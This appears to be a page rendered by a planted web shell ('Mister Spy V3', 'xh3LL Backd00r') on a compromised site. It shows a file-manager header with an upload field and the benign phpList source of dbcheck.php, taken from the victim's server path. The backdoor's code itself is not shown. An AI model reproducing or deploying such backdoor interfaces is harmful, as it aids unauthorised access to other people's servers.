Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/phplist/lists/admin/commonlib/pages/
Upload File :
Current File : /home/caballoscriollos/www/phplist/lists/admin/commonlib/pages/dbcheck.php

<?php
if (!defined('PHPLISTINIT')) exit;

print '<h3>'.s('Database structure check').'</h3>';

unset($_SESSION["dbtables"]);
$pass = true;

$ls = new WebblerListing(s('Database structure'));
while (list($table, $tablename) = each($GLOBALS["tables"])) {
  $createlink = '';
  $indexes = $uniques = $engine = $category = '';
  
  $ls->addElement($table);
  if ($table != $tablename) {
    $ls->addColumn($table,"real name",$tablename);
  }
  if (Sql_Table_Exists($tablename)) {
    $req = Sql_Query("show columns from $tablename",0);
    $columns = array();
    if (!Sql_Affected_Rows()) {
      $ls->addColumn($table,"exist",$GLOBALS["img_cross"]);
    }
    while ($row = Sql_Fetch_Array($req)) {
      $columns[strtolower($row["Field"])] = $row["Type"];
    }
    $tls = new WebblerListing($table);
    if (isset($DBstruct[$table])) {
      $struct = $DBstruct[$table];
    } else {
      $struct = '';
    }
    $haserror = 0;
    if (is_array($struct)) {
      $indexes = $uniques = $engine = $category = '';
      foreach ($struct as $column => $colstruct) {
        if (strpos($column,"index_") === false &&
          strpos($column,"unique_") === false &&
          $column != "primary key" &&
          $column != "storage_engine" &&
          $column != 'table_category') {
            $tls->addElement($column);
            $exist = isset($columns[strtolower($column)]);
            if ($exist) {
              $tls->addColumn($column,"exist",$GLOBALS["img_tick"]);
            } else {
              $haserror = 1;
              $tls->addColumn($column,"exist",$GLOBALS["img_cross"]);
            }
          } else {
            if (strpos($column,"index_") !== false) {
              $indexes .= $colstruct[0].'<br/>';
            }
            if (strpos($column,"unique_") !== false) {
              $uniques .= $colstruct[0].'<br/>';
            }
  #          if ($column == "primary key")
            if ($column == "storage_engine") {
              $engine = $colstruct[0];
            }
            if ($column == 'table_category') {
              $category = $colstruct;
            }
          }
      }
    }
  } else {
    $haserror = true;
    unset($tls);
    $createlink = PageUrl2('pageaction&action=createtable&table='.urlencode($table));
  }
  if (!$haserror) {
    $tls->collapse();
    $ls->addColumn($table,"ok",$GLOBALS["img_tick"]);
  } else {
    $pass = false;
    $ls->addColumn($table,"ok",$GLOBALS["img_cross"]);
  }
  if (!empty($indexes)) {
    $ls->addColumn($table,"index",$indexes);
  }
  if (!empty($uniques)) {
    $ls->addColumn($table,"unique",$uniques);
  }
  if (!empty($category)) {
    $ls->addColumn($table,"category",$category);
  }
  if (!empty($tls)) {
    $ls->addColumn($table,"check",$tls->display());
  }
/*
  if (!empty($createlink)) {
    $ls->addColumn($table,"create",'<div> Table is missing <a href="'.$createlink.'" class="ajaxable">Create</a></div>');
  }
*/
    
}
print $ls->display();
if ($pass) {
  cl_output('PASS');
} else {
  cl_output('FAIL');
}

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat